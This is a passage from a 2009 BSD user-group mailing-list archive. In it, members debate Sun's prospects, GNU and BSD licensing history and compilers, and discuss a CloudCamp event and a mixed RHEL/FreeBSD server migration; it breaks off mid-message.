interfaces with binary config files, because they don't > >> want anything that'll be a ``call generator''.
or, maybe the Tier 1 > >> techs are in fact taking orders from the lunchladies in the > >> cafeteria. > >> It's structured as one of these ``bottom up'' companies, you know, > >> because that's how you incubate bold new ideas. > > > > Couldn't agree more. Sun nowadays is *definitely* not the same company > > as when Bill Joy was there. Even Oracle got more fresh ideas than > > them. > > You are aware that Sun is the company behind ZFS, DTrace and Niagara > right? ZFS -- yes, DTrace -- absolutely, but Niagara?? Miles already said some interesting things about this "invention". Let me just add on top of it that its extremely low float performance and overall low performance per core compared to x86 cores just don't make it look real promising for the future. Actually SPARC has been dying for some time now -- that's why Sun jumped on the x86 bandwagon. And don't forget that their sales are dropping dramatically. Actually only the Integrity platform is seeing *any* positive growth in the enterprise market lately. --Andy From carton at Ivy.NET Sat Mar 21 10:37:27 2009 From: carton at Ivy.NET (Miles Nordin) Date: Sat, 21 Mar 2009 10:37:27 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> (Marc Spitzer's message of "Fri, 20 Mar 2009 22:44:42 -0400") References: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> Message-ID: >>>>> "ms" == Marc Spitzer writes: ms> Was not most of the original GNU products rebranded BSD, and ms> BSD licensed, tools? Maybe, but I wasn't aware of it. I thought their project started by working on some proprietary Unix platform, replacing the tools one-by-one. Do you have some citation?
Not that I necessarily agree with you it's a problem or some kind of ``hypocrisy'' if they did it, though. I just think you're slinging around a lot more than FUD to claim such a thing if it's not true. Trolling is one thing, but making up garbage to get a rise out of someone is something else entirely, so I hope you've some reason to believe it, other than you think it might piss me off. One can't prove a negative, so if this did happen then the burden of proof is on you. That said, here's the best I could do: http://git.savannah.gnu.org/cgit/bison.git/tree/REFERENCES describes differences between bison and yacc, but does not say one is based on code from the other. It does say it uses a different algorithm suggesting it was at least rewritten. http://en.wikipedia.org/wiki/GNU_Compiler_Collection#History http://groups.google.com/group/comp.lang.misc/msg/32eda22392c20f98 which does say they ``extended'' another compiler, but also says they rewrote it in C instead of some other Pascal-like language called Pastel. Copyright protects the expression of ideas, not ideas themselves, so translating from one language into another should decisively remove any taint that may or may not have existed on the sources with which they started. so, I'd say it looks pretty unlikely. Another thing to keep in mind is that ``clean room'' techniques may not have been well-known back then, because the problem of rewriting source code that you already have, to change it from one license to another, was probably not well-known---if you had the code, you kind of just did what you liked with it because why-not-seems-reasonable, which is how the AT&T lawsuit happened (CSRG and AT&T were both doing huge amounts of it). IIRC Stallman developed cleanroom techniques for reimplementing the Lisp Machine work he was doing in crappy, free form (emacs).
so, if anything he was kind of fucking up a LOT less than BSD people of the time, giving a lot more respect to the specific copyright on the source code he had in his hands. ms> There is no real way to argue that GPLing a BSD project is not ms> a violation of the authors' intent. so, first, for the _text_ of the license itself, obviously it's okay with the BSD license to re-release as GPL provided you don't delete the BSD restrictions. BSD license does not have a problem with the _additional restrictions_ imposed by the GPL, even though presumably that's what you personally have a problem with. While you have no problem with releases where you get no source code at all---a view which I still cannot understand. The problem with living under both sets of restrictions concurrently, is GPL will not allow you to redistribute a work subject to 4-clause-BSD + GPL at the same time because the advertising clause is an ``additional restriction''---a work with both licenses stuck at the top becomes as if the work had traditional copyright-to-prevent-copying. If the original holder of the copyright offers it under dual-_either_, BSD or GPL, then a subsequent redistributor could pick GPL, remove the ``additional restrictions'' along with the rest of the BSD license, and release as GPL-only---by giving permission to subsequent redistributors to remove BSD whenever they like iff they keep GPL, the GPL ``additional restrictions'' clause becomes happy. But if the original holder released as 4-clause BSD only, as you allege was the original source of most GNU tools including gcc, flex, and bison, then of course BSD has a problem with deleting the BSD license text from the redistributed copy altogether, because it says in its text you can't. You allege GNU simply removed the BSD copyright. Why would they not instead alter their license slightly to permit it to coexist with the advertising clause?
Doing so wouldn't have compromised their goals (in fact, they DID it with v3), and would have let them *legally* take all the BSD work, slap GPL restrictions on it, and continue from there. They didn't. I don't know why not. But the fact that they didn't suggests they didn't start with BSD source. BUT you're asking me to defend from something slightly different, both harder (because it's hazy) and easier (because one can't prove a negative), than actual strict compliance with the text: you want the _intent_ of the BSD developers. I'm not sure I have to argue any of this as part of my beef with Sun---there's no reason Sun and GNU can't both be wrong. Sun doesn't lose all their rights to complain about someone doing shifty things with the CDDL like ``greenbytes'' might be, or Microsoft trying to break Java in exactly the way Sun predicted they would and thus violating the license, just because they're themselves being shifty with the GPL. irc arguing may work that way. the Daily News may work that way. but the world doesn't. Nevertheless I think it would be extremely easy to argue, starting with the common intent-statement BSD-license authors make of, ``we just want as many people to use our code as possible,'' and next, the change to three-clause BSD license from the four-clause, the purpose of which was to make it GPLv2 compatible by removing the ``additional restriction'' the GPL couldn't accept---almost every BSD author contactable agrees to 3-clause and thus implicitly to having their work forked as GPL. I guess where your side goes from here, is to point at Theo and say ``choice of license doesn't indicate intent with a BSD developer, because many of them (a) aren't capable of articulating their intent clearly and consistently, and (b) tend to understand licenses rather incompletely. They say things like `I'm apolitical. I just want to get work done.' 
'' Well, obviously that situation is hard to even comprehend, much less debate, but---if the author's intent is, ``I want as many people as possible to use my work as long as they're not Linux,'' AND if FSF really did start with BSD code which seems pretty fucking unlikely, well then, I win again because Linux didn't exist back then! ms> does not the FSF heavily and massively misrepresent the word ms> free in their message? GPL cannot be free as the word is ms> defined in the dictionary, their core message includes definition of exactly what they mean by the word: the ``four essential freedoms.'' http://www.fsf.org/licensing/essays/free-sw.html They even take pains to avoid the word free whenever practical because of its multiple meanings: using it as ``software freedom'' or replacing it with ``libre''. If you go look at the actual message coming out of FSF, I think it's virtually impossible to make the case they're trying to profit from confusion. If you're saying, ``I feel like I might have been confused and they profited, for like two seconds, five years ago before I started hating everything GPL, because here, look!, look at my dictionary,'' well in that case I have to agree with you, that might have happened. but IIRC my use of the word free was not the FSF's.
From kacanski_s at yahoo.com Sat Mar 21 10:47:59 2009 From: kacanski_s at yahoo.com (Aleksandar Kacanski) Date: Sat, 21 Mar 2009 07:47:59 -0700 (PDT) Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49c4d2cf.0eFpGM4hlcQb99Yq%akosela@andykosela.com> References: <49C16BAE.5030305@ceetonetechnology.com> <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <49c4d2cf.0eFpGM4hlcQb99Yq%akosela@andykosela.com> Message-ID: <608357.17073.qm@web53605.mail.re2.yahoo.com> > > On Mar 19, 2009, at 6:43 PM, Andy Kosela wrote: > > > Miles Nordin wrote: > > > >> But yeah, the brilliant work of fresh college grads that made Sun > >> great in the old days has already been largely squished by this new > >> regime that insists on pandering to idiot Bank sysadmins, and it > >> smells like there's this growing culture of laziness-as-a-virtue > >> festering in there---like, the Tier 1 phonemonkeys in the call center > >> seem to be running the entire company, bossing around the developers > >> to the point they live in fear and create these assertion-riddled > >> Fisher Price interfaces with binary config files, because they don't > >> want anything that'll be a ``call generator''. or, maybe the Tier 1 > >> techs are in fact taking orders from the lunchladies in the > >> cafeteria. > >> It's structured as one of these ``bottom up'' companies, you know, > >> because that's how you incubate bold new ideas. > > > > Couldn't agree more. Sun nowadays is *definitely* not the same company > > as when Bill Joy was there. Even Oracle got more fresh ideas than > > them. > > You are aware that Sun is the company behind ZFS, DTrace and Niagara > right? ZFS -- yes, DTrace -- absolutely, but Niagara?? Miles already said some interesting things about this "invention".
Let me just add on top of it that its extremely low float performance and overall low performance per core compared to x86 cores just don't make it look real promising for the future. Actually SPARC has been dying for some time now -- that's why Sun jumped on the x86 bandwagon. And don't forget that their sales are dropping dramatically. Actually only the Integrity platform is seeing *any* positive growth in the enterprise market lately. --Andy Sun is also doing well in the HPC market. I work with both IBM and SUN extensively and I see this move as IBM's attempt to be preemptive. I would argue that SUN is actually getting better in delivering a variety of products and services. As far as SPARC is concerned, you may quote specs, but SUN did an excellent job with CoolThreads. In my experience apache, java and tomcat are performing significantly better, faster when running on the sparc platform. This is not to say that you can't achieve similar things on bsd or linux but the fact is that performance of applications is not lacking on the sparc platform. On the HPC side, lustre, qfs, zfs, sge and the rest of the products dedicated to storage, shared FS and parallel computing are very popular on the market. --sasha From akosela at andykosela.com Sat Mar 21 12:38:04 2009 From: akosela at andykosela.com (Andy Kosela) Date: Sat, 21 Mar 2009 17:38:04 +0100 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> Message-ID: <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> Miles Nordin wrote: > >>>>> "ms" == Marc Spitzer writes: > > ms> Was not most of the original GNU products rebranded BSD, and > ms> BSD licensed, tools? > > Maybe, but I wasn't aware of it.
I thought their project started by > working on some proprietary Unix platform, replacing the tools > one-by-one. Do you have some citation? Not that I necessarily agree > with you it's a problem or some kind of ``hypocrisy'' if they did it, > though. The first freely-redistributable code from Berkeley was actually Networking Release 1 from 1989, and GNU started a few years earlier, so I think you don't know what you are talking about here, Marc. Also gcc started as a Pastel compiler and definitely was *not* based on pcc. Speaking about pcc I hope we will see more of it in *BSD, as it is a truly historically BSD-centered C compiler with a tradition going back to Bell Labs. I don't really know what the real intention of GNU was and on what source code they based their first work, but IMHO their utilities in most part are inferior to BSD ones -- compare libc vs. glibc, BSD toolset vs. coreutils, tcsh vs. bash etc. Their bloat is enormous. --Andy From carton at Ivy.NET Sat Mar 21 16:06:17 2009 From: carton at Ivy.NET (Miles Nordin) Date: Sat, 21 Mar 2009 16:06:17 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> (Andy Kosela's message of "Sat, 21 Mar 2009 17:38:04 +0100") References: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> Message-ID: >>>>> "ak" == Andy Kosela writes: ak> pcc I hope we will see more of it in *BSD pcc == fossil record compiler don't confuse ``software architect'' with ``software archaeologist''. llvm == future % [meh].
From akosela at andykosela.com Sat Mar 21 17:05:10 2009 From: akosela at andykosela.com (Andy Kosela) Date: Sat, 21 Mar 2009 22:05:10 +0100 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: References: <49c22159.qq6MrEMjPg5IVKXP%akosela@andykosela.com> <692204DA-39F3-4AAB-905F-BEA2BA8608D9@exit2shell.com> <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> Message-ID: <49c55686.YD9VDk5J90OeAiQh%akosela@andykosela.com> Miles Nordin wrote: > >>>>> "ak" == Andy Kosela writes: > > ak> pcc I hope we will see more of it in *BSD > > pcc == fossil record compiler > > don't confuse ``software architect'' with ``software archaeologist''. > > llvm == future % [meh]. Maybe, but it is still better and *faster* in some situations than gcc. I see pcc as the only possible alternative to GNU's monster. LLVM can possibly be nice too from what I read -- I just haven't really checked it yet. --Andy From brian.gupta at gmail.com Sun Mar 22 01:23:52 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 22 Mar 2009 01:23:52 -0400 Subject: [nycbug-talk] First CloudCamp NYC happening April 1st, 2009. (Limited registration) In-Reply-To: <5b5090780903212222p5e3b22aey5dcb2851b655e063@mail.gmail.com> References: <5b5090780903212214m3948e217v573c447ee983c78d@mail.gmail.com> <5b5090780903212218p5791cdc2i3f59a82bc8cca9b9@mail.gmail.com> <5b5090780903212219n2a625d1erd425084ebe09087d@mail.gmail.com> <5b5090780903212220q52a7a273oe561e6e209b33395@mail.gmail.com> <5b5090780903212222p5e3b22aey5dcb2851b655e063@mail.gmail.com> Message-ID: <5b5090780903212223i613c6d9fgc2204347a83cf88b@mail.gmail.com> I'm gonna be going and hope to see some of you guys there.
This will be a great opportunity to share with others who have been active in the cloud space. Come if you are currently using services like EC2/S3, or are even thinking about it. Please register ASAP as tickets are limited (and free!): http://cloudcamp-newyork-09.eventbrite.com/ BTW - When I say cloud there are basically three types of cloud offerings: 1) Software as a service (e.g. Google Apps for Your Domain, FreshBooks, GitHub, SalesForce, etc) 2) Platform as a service (e.g. Google App Engine, EngineYard, Aptana, Force.com, etc) 3) Infrastructure as a service (e.g. Amazon Web Services, Sun Cloud, Linode, Joyent, etc) Here is the site for the event: http://www.cloudcamp.com/newyork/ (Press release below.) Please feel free to let me know (on or off list) if you have any questions, as I know some of the organizers. Also, if you know anyone who is interested in sponsoring the event, I attached the sponsorship docs. Payment is not required at the time of the event, just a commitment. Cheers, -Brian P.S. - I am pretty excited this event is coming to NYC. CloudCamp and Cloud Computing Interoperability Forum to Bring Together the Brightest Minds in Cloud Computing - Tickets Available New York, NY (PRWEB) March 19, 2009 -- CloudCamp, an informal, member-supported gathering formed to provide a common ground for the introduction and advancement of cloud computing, today announced the CloudCamp New York event and the Wall Street Cloud Computing Interoperability Forum (CCIF). CloudCamp New York will be held Wednesday, April 1, 2009 from 6-11pm at the Sun Microsystems office, 101 Park Avenue, New York, NY 10017. CCIF will be held on April 2, from 10am-4pm at the Thomson Reuters office at 195 Broadway, New York, NY 10007. Through CloudCamp events, attendees can exchange ideas, knowledge and information in a creative and supporting environment, advancing the current state of cloud computing and related technologies.
The Cloud Computing Interoperability Forum is an open, vendor neutral gathering of cloud computing professionals focused on building community consensus, exploring emerging trends, and advocating best practices and reference architectures for the purposes of standardized cloud computing. CloudCamp relies entirely on the community to help with meeting content, speakers, meeting locations, equipment and membership recruitment. There are a number of opportunities to get involved, including:
* ATTEND - Attending CloudCamp is free, fun and informative. Tickets are available now - sign up at http://www.cloudcamp.com/newyork.
* PRESENT - CloudCamp will follow the popular Open Space format, which encourages an open exchange between presenters and participants. If you have a cloud-related topic to discuss, visit the CloudCamp New York page and present your ideas.
* SPONSOR - CloudCamp depends on corporate sponsors who provide venues, financial assistance and other valuable donations.
  - CloudCamp sponsors include Sun, Microsoft, IBM, Enomaly, Appistry, ZeroNines, Adaptivity and others.
  - CCIF sponsors include Thomson Reuters, IBM, Enomaly, Appistry, Adaptivity and others.
  - Sponsors receive recognition for their support and enhanced visibility at the Camp. If you would like to sponsor CloudCamp or CCIF, please contact Jesse Silver.
* ORGANIZE - CloudCamp is a non-profit, volunteer-driven organization. If you'd like to help plan a future CloudCamp, join an organizing committee by signing up for the CloudCamp Google Group and letting us know about your interest.
CloudCamp on the Web To learn more about CCIF, please visit http://www.cloudforum.org. CloudCamp can also be found in various places around the Web:
* http://twitter.com/cloudcamp - CloudCamp on Twitter
* http://twitter.com/cloudforum -- CCIF on Twitter
* http://www.facebook.com/group.php?gid=10128776220 -- CloudCamp on Facebook
Contacts Media:
?* Sam Charrington, (415) 727-1850, sam -at- appistry -dot- com ? ?* Jesse Silver, (310) 766-2006 Program - CloudCamp: ? ?* Dave Nielsen, (415) 531-6674 Program - CCIF: ? ?* Reuven Cohen About CloudCamp CloudCamp was formed in 2008 in order to provide a common ground for the introduction and advancement of cloud computing. Through a series of local CloudCamp events, attendees can exchange ideas, knowledge and information in a creative and supporting environment, advancing the current state of cloud computing and related technologies. Planned 2009 events include Amsterdam, Antwerp, Bangalore, Berlin, New York, Stockholm and Singapore. -- - Brian Gupta New York City user groups calendar: http://nyc.brandorr.com/ -------------- next part -------------- A non-text attachment was scrubbed... Name: CCandCCIFNYSponsorship2009.pdf Type: application/pdf Size: 54475 bytes Desc: not available URL: From brian.gupta at gmail.com Sun Mar 22 02:30:06 2009 From: brian.gupta at gmail.com (Brian Gupta) Date: Sun, 22 Mar 2009 02:30:06 -0400 Subject: [nycbug-talk] Sun News Roundup In-Reply-To: <49c55686.YD9VDk5J90OeAiQh%akosela@andykosela.com> References: <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> <49c55686.YD9VDk5J90OeAiQh%akosela@andykosela.com> Message-ID: <5b5090780903212330r1e94dfc7p5e753532bf4a52ca@mail.gmail.com> What do you guys think about Open64?? http://www.open64.net/about-open64.html On Sat, Mar 21, 2009 at 5:05 PM, Andy Kosela wrote: > Miles Nordin wrote: > >> >>>>> "ak" == Andy Kosela writes: >> >> ? ? ak> pcc I hope we will see more of it in *BSD >> >> pcc == fossil record compiler >> >> don't confuse ``software architect'' with ``software archaeologist''. >> >> llvm == future % [meh]. 
>
> Maybe, but it is still better and *faster* in some situations than gcc.
> I see pcc as the only possible alternative to GNU's monster.  LLVM can
> possibly be nice too from what I read -- I just haven't really checked
> it yet.
>
> --Andy

--
- Brian Gupta
New York City user groups calendar: http://nyc.brandorr.com/

From lists at kithalsted.com Sun Mar 22 04:28:22 2009
From: lists at kithalsted.com (Kit Halsted)
Date: Sun, 22 Mar 2009 04:28:22 -0400
Subject: [nycbug-talk] Sun News Roundup
In-Reply-To: <5b5090780903212330r1e94dfc7p5e753532bf4a52ca@mail.gmail.com>
References: <9170ABD5-DD81-499B-8339-88C23AF80A03@nomadlogic.org> <49c2ca7b.Yu60CU+yajGIXeNc%akosela@andykosela.com> <46F034FD-F38B-40FC-8F6D-E82BB5460784@exit2shell.com> <8c50a3c30903201944l7cb28713k52ce28ac6909973@mail.gmail.com> <49c517ec.lAPjyo1TJLjUvMTO%akosela@andykosela.com> <49c55686.YD9VDk5J90OeAiQh%akosela@andykosela.com> <5b5090780903212330r1e94dfc7p5e753532bf4a52ca@mail.gmail.com>
Message-ID:

Open64 is GPL. IIUC, the primary reason for the resurrection of PCC was the need for a BSD-licensed C compiler. Having seen what happens when the OpenBSD people decide that they need to replace a piece of software due to license issues before, I would not be surprised to see PCC suddenly become the new default BSD compiler. (Hell, if you want to get down to it, I'm a little surprised it hasn't happened already.)

Cheers,
-Kit

On Mar 22, 2009, at 2:30 AM, Brian Gupta wrote:

> What do you guys think about Open64?? http://www.open64.net/about-open64.html
>
> On Sat, Mar 21, 2009 at 5:05 PM, Andy Kosela
> wrote:
>> Miles Nordin wrote:
>>
>>>>>>>> "ak" == Andy Kosela writes:
>>>
>>>    ak> pcc I hope we will see more of it in *BSD
>>>
>>> pcc == fossil record compiler
>>>
>>> don't confuse ``software architect'' with ``software
>>> archaeologist''.
>>>
>>> llvm == future % [meh].
>>
>> Maybe, but it is still better and *faster* in some situations than
>> gcc.
>> I see pcc as the only possible alternative to GNU's monster. LLVM
>> can
>> possibly be nice too from what I read -- I just haven't really
>> checked
>> it yet.
>>
>> --Andy

From matt at atopia.net Mon Mar 23 19:00:23 2009
From: matt at atopia.net (Matt Juszczak)
Date: Mon, 23 Mar 2009 19:00:23 -0400 (EDT)
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
Message-ID:

Hi all,

Has anyone ever tried a mixed RHEL and FreeBSD environment? We're 100% RHEL right now, but migrating to a new data center. Considering the options and the amount of BSD fans in the mix, we'd like to switch at least the lower trafficked boxes (utility boxes, jump boxes, etc.) to FreeBSD. We are also debating making our webs FreeBSD, because of some research that shows Apache seems to run nicely on FreeBSD compared to RHEL (if not better in certain circumstances).

100% FreeBSD is not an option, for the fact that for now, we're going to keep our database boxes (which will only have a LAN connection) RHEL. This is because of the recent issues with FreeBSD and MySQL performance vs. RHEL. We've done our own testing, and have had good results, but feel like coupling a data center migration AND an OS change on the DB servers (where we are most likely to have performance problems) is too many changes at once.

What are everyone's thoughts? Is a potentially mixed environment like this potentially beneficial? Stupid? I'm also very curious to know of people's research on Apache/PHP with FreeBSD vs. Linux.

Thanks,

Matt

From pete at nomadlogic.org Mon Mar 23 19:40:23 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Mon, 23 Mar 2009 16:40:23 -0700
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To:
References:
Message-ID:

On 23-Mar-09, at 4:00 PM, Matt Juszczak wrote:

> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment?
> We're
> 100%
> RHEL right now, but migrating to a new data center. Considering the
> options and the amount of BSD fans in the mix, we'd like to switch at
> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
> FreeBSD. We are also debating making our webs FreeBSD, because of
> some
> research that shows Apache seems to run nicely on FreeBSD compared
> to RHEL
> (if not better in certain circumstances).
>
> 100% FreeBSD is not an option, for the fact that for now, we're
> going to
> keep our database boxes (which will only have a LAN connection) RHEL.
> This is because of the recent issues with FreeBSD and MySQL
> performance
> vs. RHEL. We've done our own testing, and have had good results,
> but feel
> like coupling a data center migration AND an OS change on the DB
> servers
> (where we are most likely to have performance problems) is too many
> changes at once.
>
> What are everyone's thoughts? Is a potentially mixed environment like
> this potentially beneficial? Stupid? I'm also very curious to know
> of
> people's research on Apache/PHP with FreeBSD vs. Linux.
>

Hi Matt,
I don't think having a heterogeneous environment is inherently evil per se. Having worked in a pretty heterogeneous environment (several IRIX flavours, several RHEL versions as well as sun, NT, OSX) I found that if you have a decent provisioning, asset mgmt and config mgmt infrastructure in place that will make managing the environment much much easier. granted - all those things will help managing any environment won't they? :)

From a high level POV - i'd just suggest that you keep your OS's homogeneous from an application or service perspective. Having a mixed hat of FreeBSD, RHEL httpd instances for the same application can get a little unruly and harder to manage. Yet if you have a pool of FreeBSD httpd's hitting a layer of RHEL app servers and mysql instances that *should* help mitigate some of the complexity.

just my two bits...

-p

From pete at nomadlogic.org Mon Mar 23 20:00:01 2009
From: pete at nomadlogic.org (Pete Wright)
Date: Mon, 23 Mar 2009 17:00:01 -0700
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To: <1539739352-1237851922-cardhu_decombobulator_blackberry.rim.net-777151011-@bxe1215.bisx.prod.on.blackberry>
References: <1539739352-1237851922-cardhu_decombobulator_blackberry.rim.net-777151011-@bxe1215.bisx.prod.on.blackberry>
Message-ID:

yea no problem - i reckon you should be ok. although at the end of the day it's probably how comfortable you all feel supporting freebsd, and if you all have any linux'ism in your code you'll need to port. since it's php - you should be all set.

hope your migration goes well...i'm actually in the middle of something similar right now :)

-p

On 23-Mar-09, at 4:45 PM, matt at atopia.net wrote:

> Pete,
>
> Thanks for your help. The only thing that would run rhel would be
> the DB setup. ALL webs would be freebsd. So we wouldn't be using
> multiple OS's on the same class of box.
>
> M
>
> ------Original Message------
> From: Pete Wright
> To: Matt Juszczak
> Cc: talk at lists.nycbug.org
> Subject: Re: [nycbug-talk] Mixed RHEL / FreeBSD environment
> Sent: Mar 23, 2009 19:40
>
>
> On 23-Mar-09, at 4:00 PM, Matt Juszczak wrote:
>
>> Hi all,
>>
>> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're
>> 100%
>> RHEL right now, but migrating to a new data center. Considering the
>> options and the amount of BSD fans in the mix, we'd like to switch at
>> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
>> FreeBSD. We are also debating making our webs FreeBSD, because of
>> some
>> research that shows Apache seems to run nicely on FreeBSD compared
>> to RHEL
>> (if not better in certain circumstances).
>>
>> 100% FreeBSD is not an option, for the fact that for now, we're
>> going to
>> keep our database boxes (which will only have a LAN connection) RHEL.
>> This is because of the recent issues with FreeBSD and MySQL
>> performance
>> vs. RHEL. We've done our own testing, and have had good results,
>> but feel
>> like coupling a data center migration AND an OS change on the DB
>> servers
>> (where we are most likely to have performance problems) is too many
>> changes at once.
>>
>> What are everyone's thoughts? Is a potentially mixed environment
>> like
>> this potentially beneficial? Stupid? I'm also very curious to know
>> of
>> people's research on Apache/PHP with FreeBSD vs. Linux.
>>
>
>
> Hi Matt,
> I don't think having a heterogeneous environment is inherently evil
> per se. Having worked in a pretty heterogeneous environment (several IRIX
> flavours, several RHEL versions as well as sun, NT, OSX) I found that
> if you have a decent provisioning, asset mgmt and config mgmt
> infrastructure in place that will make managing the environment much
> much easier. granted - all those things will help managing any
> environment won't they? :)
>
> From a high level POV - i'd just suggest that you keep your OS's
> homogeneous from an application or service perspective. Having a mixed
> hat of FreeBSD, RHEL httpd instances for the same application can get
> a little unruly and harder to manage. Yet if you have a pool of
> FreeBSD httpd's hitting a layer of RHEL app servers and mysql
> instances that *should* help mitigate some of the complexity.
>
> just my two bits...
>
> -p
>

From matt at atopia.net Mon Mar 23 19:45:23 2009
From: matt at atopia.net (matt at atopia.net)
Date: Mon, 23 Mar 2009 23:45:23 +0000
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
Message-ID: <1539739352-1237851922-cardhu_decombobulator_blackberry.rim.net-777151011-@bxe1215.bisx.prod.on.blackberry>

Pete,

Thanks for your help. The only thing that would run rhel would be the DB setup. ALL webs would be freebsd. So we wouldn't be using multiple OS's on the same class of box.

M

------Original Message------
From: Pete Wright
To: Matt Juszczak
Cc: talk at lists.nycbug.org
Subject: Re: [nycbug-talk] Mixed RHEL / FreeBSD environment
Sent: Mar 23, 2009 19:40


On 23-Mar-09, at 4:00 PM, Matt Juszczak wrote:

> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're
> 100%
> RHEL right now, but migrating to a new data center. Considering the
> options and the amount of BSD fans in the mix, we'd like to switch at
> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
> FreeBSD. We are also debating making our webs FreeBSD, because of
> some
> research that shows Apache seems to run nicely on FreeBSD compared
> to RHEL
> (if not better in certain circumstances).
>
> 100% FreeBSD is not an option, for the fact that for now, we're
> going to
> keep our database boxes (which will only have a LAN connection) RHEL.
> This is because of the recent issues with FreeBSD and MySQL
> performance
> vs. RHEL. We've done our own testing, and have had good results,
> but feel
> like coupling a data center migration AND an OS change on the DB
> servers
> (where we are most likely to have performance problems) is too many
> changes at once.
>
> What are everyone's thoughts? Is a potentially mixed environment like
> this potentially beneficial? Stupid? I'm also very curious to know
> of
> people's research on Apache/PHP with FreeBSD vs. Linux.
>

Hi Matt,
I don't think having a heterogeneous environment is inherently evil per se. Having worked in a pretty heterogeneous environment (several IRIX flavours, several RHEL versions as well as sun, NT, OSX) I found that if you have a decent provisioning, asset mgmt and config mgmt infrastructure in place that will make managing the environment much much easier. granted - all those things will help managing any environment won't they? :)

From a high level POV - i'd just suggest that you keep your OS's homogeneous from an application or service perspective. Having a mixed hat of FreeBSD, RHEL httpd instances for the same application can get a little unruly and harder to manage. Yet if you have a pool of FreeBSD httpd's hitting a layer of RHEL app servers and mysql instances that *should* help mitigate some of the complexity.

just my two bits...

-p

From o_sleep at belovedarctos.com Mon Mar 23 21:38:46 2009
From: o_sleep at belovedarctos.com (Bjorn Nelson)
Date: Mon, 23 Mar 2009 21:38:46 -0400
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To:
References:
Message-ID: <49C839A6.2020304@belovedarctos.com>

Matt Juszczak wrote:
> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're 100%
> RHEL right now, but migrating to a new data center. Considering the
> options and the amount of BSD fans in the mix, we'd like to switch at
> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
> FreeBSD. We are also debating making our webs FreeBSD, because of some
> research that shows Apache seems to run nicely on FreeBSD compared to RHEL
> (if not better in certain circumstances).

When we added kernel carp to our freebsd hosts at my old job, it really made it easy to keep primary services like dns, smtp, etc. available during maintenance/hardware issues. It's really simple once you get it setup and for the freedom it gives you, I really treasured it.

-Bjorn

From trish at bsdunix.net Mon Mar 23 21:18:18 2009
From: trish at bsdunix.net (Siobhan Lynch)
Date: Mon, 23 Mar 2009 21:18:18 -0400
Subject: [nycbug-talk] Mixed RHEL / FreeBSD environment
In-Reply-To:
References:
Message-ID: <49C834DA.5040003@bsdunix.net>

On 3/23/09 7:00 PM, Matt Juszczak wrote:
> Hi all,
>
> Has anyone ever tried a mixed RHEL and FreeBSD environment? We're 100%
> RHEL right now, but migrating to a new data center. Considering the
> options and the amount of BSD fans in the mix, we'd like to switch at
> least the lower trafficked boxes (utility boxes, jump boxes, etc.) to
> FreeBSD.
> We are also debating making our webs FreeBSD, because of some
> research that shows Apache seems to run nicely on FreeBSD compared to RHEL
> (if not better in certain circumstances).
>

We've moved most of our utility boxes to FreeBSD - and I'm pretty happy. We don't use RHEL, we use Ubuntu, but the idea is the same.

Our scheme is:

